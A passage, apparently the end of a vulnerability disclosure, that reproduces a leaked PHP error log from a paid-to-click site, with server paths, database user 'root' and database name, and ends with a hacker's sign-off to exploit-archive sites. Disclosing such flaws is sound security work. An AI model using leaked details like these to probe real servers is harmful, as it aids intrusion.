Santilga_Application,[type] => ->,[args] => Array ())),[] => ))
Error!! 21.07.10 11:37:43- Uncaught Santilga_Database_Exception, code: 3,Message: Could not connect to database

#0 Santilga_Error->ExceptionHandler(Santilga_Database_Exception Object ([] => Could not connect to database,[] => ,[] => 3,[] => E:\servers\xampp\htdocs\ptc\libraries\santilga\database\driver\Mysql.php,[] => 29,[] => Array ([0] => Array ([file] => E:\servers\xampp\htdocs\ptc\libraries\santilga\database\Database.php,[line] => 39,[function] => __construct,[class] => Santilga_Database_Driver_Mysql,[type] => ->,[args] => Array ([0] => Array ([driver] => mysql,[host] => localhost,[user] => root,[database] => clicktopay))),[1] => Array ([file] => E:\servers\xampp\htdocs\ptc\libraries\santilga\init\Init.php,[line] => 55,[function] => getInstance,[class] => Santilga_Database,[type] => ::,[args] => Array ()),[2] => Array ([file] => E:\servers\xampp\htdocs\ptc\libraries\santilga\init\Init.php,[line] => 10,[function] => initDb,[class] => Santilga_Init,[type] => ->,[args] => Array ()),[3] => Array ([file] => E:\servers\xampp\htdocs\ptc\application\Init.php,[line] => 10,[function] => init,[class] => Santilga_Init,[type] => ->,[args] => Array ()),[4] => Array ([file] => E:\servers\xampp\htdocs\ptc\libraries\santilga\application\Application.php,[line] => 32,[function] => init,[class] => Init,[type] => ->,[args] => Array ()),[5] => Array ([file] => E:\servers\xampp\htdocs\ptc\public_html\index.php,[line] => 35,[function] => __construct,[class] => Santilga_Application,[type] => ->,[args] => Array ())),[] => ))
Error!! 21.07.10 12:03:55- WARNING: Cannot modify header information - headers already sent by (output started at E:\servers\xampp\htdocs\ptc\public_html\index.php:4) in E:\servers\xampp\htdocs\ptc\libraries\santilga\error\Error.php on line 151

#0 Santilga_Error->ErrorHandler(2, Cannot modify header information - headers already sent by (output started at E:\servers\xampp\htdocs\ptc\public_html\index.php:4), E:\servers\xampp\htdocs\ptc\libraries\santilga\error\Error.php, 151, Array ([exception] => Santilga_Session_Exception Object ([] => Headers already sent,[] => ,[] => 0,[] => E:\servers\xampp\htdocs\ptc\libraries\santilga\session\Session.php,[] => 47,[] => Array ([0] => Array ([file] => E:\servers\xampp\htdocs\ptc\libraries\santilga\session\Session.php,[line] => 34,[function] => start,[class] => Santilga_Session,[type] => ->,[args] => Array ()),[1] => Array ([file] => E:\servers\xampp\htdocs\ptc\libraries\santilga\init\Init.php,[line] => 65,[function] => getInstance,[class] => Santilga_Session,[type] => ::,[args] => Array ()),[2] => Array ([file] => E:\servers\xampp\htdocs\ptc\libraries\santilga\init\Init.php,[line] => 8,[function] => initSession,[class] => Santilga_Init,[type] => ->,[args] => Array ()),[3] => Array ([file] => E:\servers\xampp\htdocs\ptc\application\Init.php,[line] => 10,[function] => init,[class] => Santilga_Init,[type] => ->,[args] => Array ()),[4] => Array ([file] => E:\servers\xampp\htdocs\ptc\libraries\santilga\application\Application.php,[line] => 32,[function] => init,[class] => Init,[type] => ->,[args] => Array ()),[5] => Array ([file] => E:\servers\xampp\htdocs\ptc\public_html\index.php,[line] => 35,[function] => __construct,[class] => Santilga_Application,[type] => ->,[args] => Array ())),[] => )))
#1 ob_gzhandler(

Warning: The magic method __set() must have public visibility and cannot be static in E:\servers\xampp\htdocs\ptc\libraries\santilga\object\Object.php on line 6



Warning: The magic method __get() must have public visibility and cannot be static in E:\servers\xampp\htdocs\ptc\libraries\santilga\object\Object.php on line 15

, 5)
#2 ob_get_clean() called at [E:\servers\xampp\htdocs\ptc\libraries\santilga\error\Error.php:151]
#3 Santilga_Error->ExceptionHandler(Santilga_Session_Exception Object ([] => Headers already sent,[] => ,[] => 0,[] => E:\servers\xampp\htdocs\ptc\libraries\santilga\session\Session.php,[] => 47,[] => Array ([0] => Array ([file] => E:\servers\xampp\htdocs\ptc\libraries\santilga\session\Session.php,[line] => 34,[function] => start,[class] => Santilga_Session,[type] => ->,[args] => Array ()),[1] => Array ([file] => E:\servers\xampp\htdocs\ptc\libraries\santilga\init\Init.php,[line] => 65,[function] => getInstance,[class] => Santilga_Session,[type] => ::,[args] => Array ()),[2] => Array ([file] => E:\servers\xampp\htdocs\ptc\libraries\santilga\init\Init.php,[line] => 8,[function] => initSession,[class] => Santilga_Init,[type] => ->,[args] => Array ()),[3] => Array ([file] => E:\servers\xampp\htdocs\ptc\application\Init.php,[line] => 10,[function] => init,[class] => Santilga_Init,[type] => ->,[args] => Array ()),[4] => Array ([file] => E:\servers\xampp\htdocs\ptc\libraries\santilga\application\Application.php,[line] => 32,[function] => init,[class] => Init,[type] => ->,[args] => Array ()),[5] => Array ([file] => E:\servers\xampp\htdocs\ptc\public_html\index.php,[line] => 35,[function] => __construct,[class] => Santilga_Application,[type] => ->,[args] => Array ())),[] => ))
==========================================================END======================================================================= +++++++++As always My Special Thanks to:+++++++ packetstormsecurity.org packetstormsecurity.com packetstormsecurity.net securityfocus.com cxsecurity.com security.nnov.ru securtiyvulns.com securitylab.ru 1337day.com secunia.com && to all AA Team + to all Azerbaijan Black HatZ;) ++++++++++++++++++++++++++++++++++++++++++++++++ Thank you. Life is Short :(...Try to Enjoy. /AkaStep ^_^